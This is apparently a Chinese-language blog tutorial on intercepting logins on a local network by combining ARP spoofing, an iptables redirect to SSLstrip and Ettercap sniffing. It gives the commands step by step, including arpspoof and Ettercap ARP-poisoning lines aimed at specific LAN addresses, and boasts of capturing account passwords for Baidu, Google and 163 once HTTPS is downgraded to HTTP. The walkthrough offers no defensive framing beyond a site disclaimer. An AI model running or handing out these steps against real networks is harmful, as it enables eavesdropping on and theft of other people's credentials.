您好,登錄后才能下訂單哦!
***回顧
SSLstrip + EtterCap 中間人***實(shí)現(xiàn)https轉(zhuǎn)換成http 以獲取帳號密碼。
Linux環(huán)境下 我們使用iptables過濾一下數(shù)據(jù)包,然后用sslstrip監(jiān)聽端口,獲取數(shù)據(jù)。
數(shù)據(jù)包轉(zhuǎn)發(fā) echo 1 > /pro/sys/net/ipv4/ip_forward
然后開啟Ettercap的iptables 功能
把注析去掉
來個(gè)arp欺騙不使用sslstrip 來測試一下https
Arpspoof –i –eth0 –t 192.168.1.102 192.168.1.2
Ok
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
NAT 一定的基礎(chǔ)
-T 匹配的表 NAT表 :PREROUTING 修改來的包
:OUTPUT 修改路由前本地的包
:POSTROUTING 修改準(zhǔn)備發(fā)出的包
-A 表示加入高級選項(xiàng)
-P 協(xié)議類型
-J 表示把目標(biāo)80端口的數(shù)據(jù)包轉(zhuǎn)到其他端口 上訴命令是10000端口
開啟ETTERCAP
Ettercap –T –q –I eth0
登錄http的百度 效果良好
監(jiān)聽到數(shù)據(jù)了
登錄google
發(fā)現(xiàn)在https 卡頓 無法通過
開啟sslstrip
再向google登錄的時(shí)候 https變成http
成功登錄
監(jiān)聽到帳號密碼
百度的
163的登錄
http的跳轉(zhuǎn)
網(wǎng)速過慢……
除了使用arpspoof 還可以使用
Ettercap –T –q –M arp:remote /192.168.1.101/ //
也是arp欺騙 原理一樣的。
免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場,如果涉及侵權(quán)請聯(lián)系站長郵箱:is@yisu.com進(jìn)行舉報(bào),并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。